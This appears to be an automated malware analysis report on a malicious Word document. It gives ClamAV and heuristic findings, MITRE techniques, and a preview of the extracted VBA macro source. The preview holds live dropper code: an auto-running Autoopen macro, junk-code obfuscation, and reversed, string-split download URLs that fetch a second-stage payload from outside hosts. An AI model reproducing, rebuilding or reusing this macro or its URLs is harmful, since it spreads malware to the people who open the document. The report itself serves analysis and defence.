MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and a Shell() call. The presence of these elements strongly suggests the document is designed to execute arbitrary code, likely downloading and running a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6524863-0' further supports this dropper functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6524863-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6524863-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 139070 bytes |
SHA-256: 0eb6ab382236b6fc4fb18a245247c66e7a9b1127d534c833cb5e03f6bcd7bf90 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RLfodKHatPiiV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub iqOLS(vktUrd)
Select Case jFwlsm
Case 92841
EhuqN = CByte(kEkBcF * 42643)
Case 12303
wvHwTu = Oct(77992 - Int(1466) - 45512 * SBczww)
End Select
End Sub
Sub JmdIT(FPKfJ)
Select Case PXXdR
Case 2612
lncdPh = CByte(BudIE * 77183)
Case 5334
vjcfd = Oct(50516 - Int(3014) - 68510 * OfhIR)
End Select
Select Case YLwGMP
Case 63284
ObvUL = CByte(CaVQqb * 76011)
Case 1740
XPjEUO = Oct(69833 - Int(99825) - 29260 * zFzGhp)
End Select
Select Case OaOEh
Case 11436
wFnKQR = CByte(HXYarc * 21261)
Case 24177
dbjkLj = Oct(10614 - Int(38410) - 76387 * fMNmiq)
End Select
End Sub
Sub tFObZ(zurhYj)
Select Case NzCfkc
Case 1659
iRATW = CByte(mcukqk * 65143)
Case 67984
wTDrj = Oct(80224 - Int(38859) - 97608 * nzNjKh)
End Select
Select Case FpnOo
Case 26722
DuLRz = CByte(hwIduE * 23883)
Case 61907
RfKSTf = Oct(47781 - Int(52857) - 11183 * Milvu)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case QkLAz
Case 46607
XBzrp = CByte(mGVWUX * 14994)
Case 8632
ubiSF = Oct(98587 - Int(69650) - 28226 * BNJdTA)
End Select
mrMwFIRnwwmYmb (ntHnRT + UvQizJMohMOXdK + jrTMrL)
Select Case XmPvp
Case 68475
iSYmn = CByte(qbaIm * 38839)
Case 82346
izREbn = Oct(91088 - Int(52867) - 72307 * sCidbt)
End Select
End Sub
Sub iRJJaj(dPwHQ)
Select Case ZXUls
Case 74002
qOwaCh = CByte(ukZMzh * 50277)
Case 15686
hWEQQ = Oct(51202 - Int(22357) - 78413 * KaNUhs)
End Select
Select Case purPUi
Case 12570
zGtpmH = CByte(lRUnOo * 42134)
Case 65533
CHmsG = Oct(47279 - Int(48864) - 4772 * aKmish)
End Select
Select Case QLTKhV
Case 5053
bpvAui = CByte(TMbMNv * 27811)
Case 73268
jqJLw = Oct(92963 - Int(4805) - 48671 * owdCXj)
End Select
End Sub
Sub FGQRdZ(CdraH)
Select Case UCBZui
Case 81132
rjfmW = CByte(FjTQp * 84905)
Case 61022
pzUvH = Oct(66807 - Int(13172) - 64148 * VvtSm)
End Select
End Sub
Attribute VB_Name = "EItsUNWlfHLCWJ"
Sub lPzMND(wWHFK)
Select Case JrcvTj
Case 30540
vzLuS = CByte(oovfk * 45001)
Case 58110
ftGYsz = Oct(19960 - Int(44066) - 71976 * Dsbni)
End Select
End Sub
Function UvQizJMohMOXdK()
On Error Resume Next
Select Case rziJi
Case 70332
SGQWl = CByte(laTazz * 51898)
Case 97777
JUkiU = Oct(83747 - Int(23099) - 33923 * XIVXT)
End Select
KzWFC = uFIWou("Cwr'@/'+'il'+'k'+'b'+'/moc.t'+'ranairanul//:ptth@/Fb'+'U3'+'NN/ten.ss'+'enr'+'eggit'+'/'+'/'+':ptth@'+'/'+'V'+'7'+'AkU/ua.'+'m'+'ocQY AH", 61634 - 61634 + 6 + 61634 - 61634, 61634 - 61634 + 128 + 61634 - 61634)
Select Case XjwQUu
Case 50895
RRnhG = CByte(fpLPT * 78038)
Case 19749
wPZGo = Oct(86375 - Int(97127) - 56715 * NGjDP)
End Select
Select Case ZfqHA
Case 52682
dhqHs = CByte(wMzmZ * 65529)
Case 42563
FldRa = Oct(60579 - Int(33019) - 40089 * XmpwC)
End Select
ANrvFMaZ = uFIWou("RP4.namseda'+'rtaerih'+'/'+'/:ptth@/'+'SbTF5R/moc.lletrFvkjKj", 98192 - 98192 + 7 + 98192 - 98192, 98192 - 98192 + 52 + 98192 - 98192)
Select Case OVPsBt
Case 38139
WVrlW = CByte(qSMzt * 38788)
Case 87949
pZvwI = Oct(19379 - Int(36643) - 39947 * TwhiQ)
End Select
Select Case Hbrup
Case 78888
O
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.